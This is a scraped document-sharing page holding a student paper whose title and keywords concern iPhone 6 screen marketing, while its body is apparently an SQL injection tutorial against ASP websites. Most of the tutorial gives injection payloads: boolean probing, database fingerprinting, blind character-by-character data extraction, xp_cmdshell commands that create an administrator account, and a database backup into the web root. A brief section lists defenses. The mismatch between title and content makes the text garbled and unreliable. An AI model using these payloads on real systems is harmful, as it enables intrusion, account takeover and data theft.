![東南大學srtp論文模板_第1頁](http://file2.renrendoc.com/fileroot_temp3/2021-10/28/ae79033d-4407-4755-9ec9-60d8fa8dcd24/ae79033d-4407-4755-9ec9-60d8fa8dcd241.gif)
![東南大學srtp論文模板_第2頁](http://file2.renrendoc.com/fileroot_temp3/2021-10/28/ae79033d-4407-4755-9ec9-60d8fa8dcd24/ae79033d-4407-4755-9ec9-60d8fa8dcd242.gif)
![東南大學srtp論文模板_第3頁](http://file2.renrendoc.com/fileroot_temp3/2021-10/28/ae79033d-4407-4755-9ec9-60d8fa8dcd24/ae79033d-4407-4755-9ec9-60d8fa8dcd243.gif)
![東南大學srtp論文模板_第4頁](http://file2.renrendoc.com/fileroot_temp3/2021-10/28/ae79033d-4407-4755-9ec9-60d8fa8dcd24/ae79033d-4407-4755-9ec9-60d8fa8dcd244.gif)
![東南大學srtp論文模板_第5頁](http://file2.renrendoc.com/fileroot_temp3/2021-10/28/ae79033d-4407-4755-9ec9-60d8fa8dcd24/ae79033d-4407-4755-9ec9-60d8fa8dcd245.gif)
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、光學 課程論文論文題目:淺析iphone6屏幕的宣傳賣點學 生 院 系 : 物理 學 生 姓 名 : 何翀 學 生 學 號 : 10014312 淺析iphone6屏幕的宣傳賣點摘 要關(guān)鍵詞: 雙域像素dual-domain pixels;光取向技術(shù)phote aligment;retina hd;目 錄引 言41 sql注入過程41.1判斷是否可以攻擊41.1.1輸入為數(shù)字時:41.1.2輸入為字符串時:41.2判斷數(shù)據(jù)庫類型51.2.1對于iis未關(guān)閉的51.2.2對于iis不返回錯誤信息的51.3判斷數(shù)據(jù)類型51.4猜測表名61.5猜測列名61.6得到數(shù)據(jù)61.7直接獲得用戶名及密碼72
2、.sql注入防范72.1客戶端72.2加密72.3 iis的限制72.4 iis權(quán)限的分配8結(jié) 語8參考文獻8引 言 計算機的發(fā)展越來越快,可是隨之而來的卻是一系列安全問題,這些安全問題直接威脅到了用戶的私人信息,諸如賬號,密碼,住址等,他們利用用戶的好奇心,欺騙用戶或者在用戶毫不知情的情況下,入侵pc,盜取資料,對用戶構(gòu)成一定威脅,危害不僅局限于此,譬如在08年時一場大規(guī)模的sql注入席卷了全球,他們堆積選擇ip,將目標鎖定到不同網(wǎng)站,其中包括一些受信任的網(wǎng)站,用戶點擊網(wǎng)站之后會受到感之后成為病原體?,F(xiàn)在由于程序員的水平參差不齊,在編寫程序的時候有時會很少考慮到安全方面的因素,及缺少用戶輸入
3、安全性的判斷,這樣就導致不法分子有機可乘,他們根據(jù)不同的輸入,分析返回結(jié)果,得到數(shù)據(jù)庫服務器的相關(guān)信息,最后可以為所欲為。1 sql注入過程1.1判斷是否可以攻擊首先我們要將ie瀏覽器的internet=>高級=>顯示好友http信息去掉,這樣我們就可以得到不同的錯誤,位置后的判斷打下基礎(chǔ)。比如說形如一個http:/example/mainview/show.asp?id=123這是一個正常的網(wǎng)站,在這個網(wǎng)站中數(shù)據(jù)庫服務器通常通過select * from tablename where id=123來將結(jié)果集返回給客戶端,這本來是沒有什么問題的,可是這里卻存在極大的安全隱患,比如
4、說我們可以在后面添加一些代碼,可以這樣測試1.1.1輸入為數(shù)字時:通過經(jīng)典的1,2測試法,我們可以這樣做不添加任何內(nèi)容http:/example/mainview/show.asp?id=123;不報錯添加and 1=1這樣就變成了http:/example/mainview/show.asp?id=123 and1=1;不報錯添加and 1=2 這樣就變成了http:/example/mainview/show.asp?id=123 and 1=2;報錯1.1.2輸入為字符串時:末尾添加一個,這樣就變成了http:/example/mainview/show.asp?id=123;報錯 添加
5、and 1=1這樣就變成了http:/example/mainview/show.asp?id=123 and1'='1';不報錯 添加and 1=2這樣就變成了http:/example/mainview/show.asp?id=123 and1'='2';報錯當這兩個條件均滿足時,我們可以知道show.asp不存在安全檢測機制,因此可以得到我們show.asp是存在漏洞的。判斷出這部分內(nèi)容是可以實行sql注入時,我們可以進行下屬步驟1.2判斷數(shù)據(jù)庫類型在和asp搭配的網(wǎng)站中,大多數(shù)采用的是access和sqlserver兩種數(shù)據(jù)庫,故這里我們
6、不討論mysql這種類型的。1.2.1對于iis未關(guān)閉的我們可以根據(jù)系統(tǒng)變量來判斷,對于sqlserver數(shù)據(jù)庫,其中存在一些系統(tǒng)變量,比如說user,利用這點,可以執(zhí)行以下語句http:/example/mainview/show.asp?id=123 and user>0;我們需要解釋以下,user存儲的是當前連接的用戶名,類型為nvarchar的,結(jié)果可想而知,我們將兩個 同類型的進行比較,那么系統(tǒng)首先會將nvarchar 的值轉(zhuǎn)換為int,轉(zhuǎn)換不成功,拋出錯誤,之后我們分析得到的錯誤信息:將username(用戶名)轉(zhuǎn)換為int失敗,這樣,我們不僅判斷出了這是sqlserver數(shù)
7、據(jù)庫,同時知道了用戶名為username。對于access數(shù)據(jù)庫,我們只需要簡單的在最后添加一個即可 http:/example/mainview/show.asp?id=123如果返回microsoft jet database engine 錯誤 '80040e14',說明存在字符串語法錯誤,從中我們看出在show.asp 行8存在錯誤,從這個錯誤我們可以看出這個網(wǎng)站采用的是access數(shù)據(jù)庫1.2.2對于iis不返回錯誤信息的我們可以根據(jù)系統(tǒng)表來判斷:sqlserve的系統(tǒng)表為sysobjects,access的系統(tǒng)表為msysobjects 所以我們這樣判斷http:/
8、example/mainview/show.asp?id=123 and (select count(*) from sysobjects)>0http:/example/mainview/show.asp?id=123 and (select count(*) from mysobjects)>0由于access數(shù)據(jù)庫在web環(huán)境下訪問msysobjects是沒有權(quán)限的。因此不論是哪一種情況,總是會返回錯誤信息,所以如果頁面訪問正常,那么可以判斷是sqlserver數(shù)據(jù)庫,如果不正常,有錯誤信息,則為access數(shù)據(jù)庫。1.3判斷數(shù)據(jù)類型在前面已經(jīng)介紹過了數(shù)字和字符串類型的,還有
9、一種類型是關(guān)鍵字類型的即keyword它的查詢語句大概是這個樣子的:select * from tablename where keyword like %關(guān)鍵字%;所以我們可以注入keyword= and whatyouwant and %=, 這樣sql語句就變成了select * from 表名 where字段like % and whatyouwant and %=%;其中whatyouwant就是你想要得到的東西,好了,三種格式的數(shù)據(jù)類型判斷完成后,接下來我們猜測表名1.4猜測表名方法大致如下:http:/example/mainview/show.asp?id=123 and (s
10、elect count(*)from 猜測的表名)>0如果返回的頁面沒有變化,說明存在這個猜測的表名,如果返回錯誤信息,則不存在這個表名,反復重復這個過程,我們得到相應的表名,很是繁瑣的過程,可是我們可以根據(jù)相關(guān)信息來猜測,比如說圖書管理系統(tǒng),我們會猜測book,borrower等名稱1.5猜測列名方法大致如下:http:/example/mainview/show.asp?id=123 and (select count(猜測的列) from 得到的表名)>0,反復這個過程,得到列名1.6得到數(shù)據(jù)假設(shè)我們已經(jīng)得到了表名和列名,得到數(shù)據(jù)的思路如下,先得到top 1的長度,之后判斷每
11、一位的ascii,具體實現(xiàn)如下:判斷長度:http:/example/mainview/show.asp?id=123 and (select top 1 len(列名) from 表名)>n;將n換成不同的數(shù)字,根據(jù)返回的不同值,可以得到此列第一個值長度,比如說>4正確,>5錯誤,那么這個長度就是為5,之后我們要得到每個字符對應的是什么http:/example/mainview/show.asp?id=123 and (select top 1 ascii(sbustring(列名,m,1)>asn,的m為第幾個字符,它是小于等于我們剛才得到的n的,asn為asci
12、i的值,由于數(shù)字和字母在1128之間,例如http:/example/mainview/show.asp?id=123 and (select top 1 ascii(sbustring(列名,2,1)=39;我們可以得到第二個字符是9因此通過這個方法,我們可以得到每一個字符的ascii,從而得到數(shù)據(jù),這個工作大量重復且繁瑣,自己做,算了吧,寫一個小程序。很快就搞定了。1.7直接獲得用戶名及密碼這樣做只是一些基本的方法,對于真正比較牛的黑客,會使用另外一下方法。主要是針對sqlserver數(shù)據(jù)庫的,由于sqlserver和操作系統(tǒng)有緊密聯(lián)系,如果當期的連接具有sa權(quán)限,且 xp_cmdshel
13、l(將命令字符串作為操作系統(tǒng)命令 shell 執(zhí)行,并以文本行的形式返回所有輸出)正確執(zhí)行(雖然在sqlserver2005中默認是關(guān)閉的),那么我們就很容易控制pc,操作步驟如下:http:/example/mainview/show.asp?id=123;exec master.xp_cmdshell “net user namepassword/add”-可以直接增加操作系統(tǒng)帳戶name密碼為password http:/example/mainview/show.asp?id=123;exec master.xp_cmdshell“net localgroup name adminis
14、trators /add”- 把剛剛增加的帳戶user加到administrators組中。http:/example/mainview/show.asp?id=123;backuup database 數(shù)據(jù)庫名to disk='c:inetpubwwwrootsave.db' 則把得到的數(shù)據(jù)內(nèi)容全部備份到web目錄下,再用http把此文件下載數(shù)一般來說,web虛擬目錄是:c:inetpubwwwroot; 2.sql注入防范通過上述論述,我們了解了sql注入的過程,針對過程,我們發(fā)現(xiàn),主要可以從以下幾點進行防范2.1客戶端在構(gòu)造動態(tài)sql語句中,我們要檢測用戶輸入的合法性,這
15、對于我們來說是很重要的,因為往往我們只顧及了完成編碼工作而忽略了安全問題,這樣,對于經(jīng)驗老道的程序員,很快就可以看出其中的漏洞,因此在檢查用戶輸入時,如果遇到select exec xp_cmdshell時,應該立即停止asp,并將頁面至于出錯狀態(tài)。2.2加密當然加密是很重要的,我們可以采取一些加密算法,例如md5,rsa,des等,來阻止你獲得密碼2.3 iis的限制在sql注入過程中,iis的返回信息無疑是最大的幫兇,因此,對于iis的管理員,可以不管是什么樣的錯誤,都設(shè)置成同一種錯誤返回回來,這樣,就可以避免不法分子通過放回錯誤來達到目的,但是這樣做的結(jié)果會增加程序員的負荷,程序員不知道是什么除了錯,因此對于修正錯誤會有影響。2.4 iis權(quán)限的分配盡量給web最低權(quán)限,如果web只涉及到某幾張表,那么只給他這幾張表的訪問權(quán)限,如果有修改操作,將update權(quán)限給它,總之它需要什么,我們提供給他什么,其余的不會給。結(jié) 語sql注入在國內(nèi)日漸成熟,不法分子越來越多,我們的私人信息面臨威脅,因此作為將來要從事軟件開發(fā)的人員,我覺的我們有必要對這種安全漏洞進行徹底的分析,盡量減少它對我們客戶的影響,有一個想法,是這樣的,我認為我們可以設(shè)置一些虛假的用戶名,密碼,看似具有管理員權(quán)限,實則沒有,同時,我們在檢測用戶輸入時候?qū)τ谀切┓欠ǖ念愃苨e
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 表內(nèi)乘法題目數(shù)學試卷
- 2020幼兒園幼兒膳食工作總結(jié)-幼兒園食堂工作總結(jié)范文5篇
- 2025年度教育類在線考試系統(tǒng)開發(fā)合同
- 2025年度特殊景觀植物引種與應用合同
- 2025年度網(wǎng)絡(luò)安全防護技術(shù)合同范本
- 現(xiàn)代物流業(yè)與科技教育的新機遇
- 物聯(lián)網(wǎng)時代下的Java嵌入式系統(tǒng)開發(fā)探討
- 2025年度醫(yī)療設(shè)備養(yǎng)護與故障快速響應合同
- 2025年度智能物流配送平臺建設(shè)合同
- 2025年度大型商業(yè)綜合體消防設(shè)施供水供電合同協(xié)議書
- 06歲兒童眼保健知識培訓課件
- 企業(yè)商業(yè)秘密保護操作指引(2023版)
- 三年級數(shù)學口算題300道 (可直接打印)
- 益生芽孢桿菌體外抑菌活性及耐藥性研究
- 2023數(shù)聯(lián)網(wǎng)(DSSN)白皮書
- ISO17025經(jīng)典培訓教材
- 消防設(shè)施操作和維護保養(yǎng)規(guī)程
- 反面典型案例剖析材料范文(通用6篇)
- 餐飲行業(yè)品牌介紹商務宣傳PPT模板
- 關(guān)于中小企業(yè)人才流失的調(diào)查分析報告畢業(yè)論文
- 質(zhì)量源于設(shè)計課件
評論
0/150
提交評論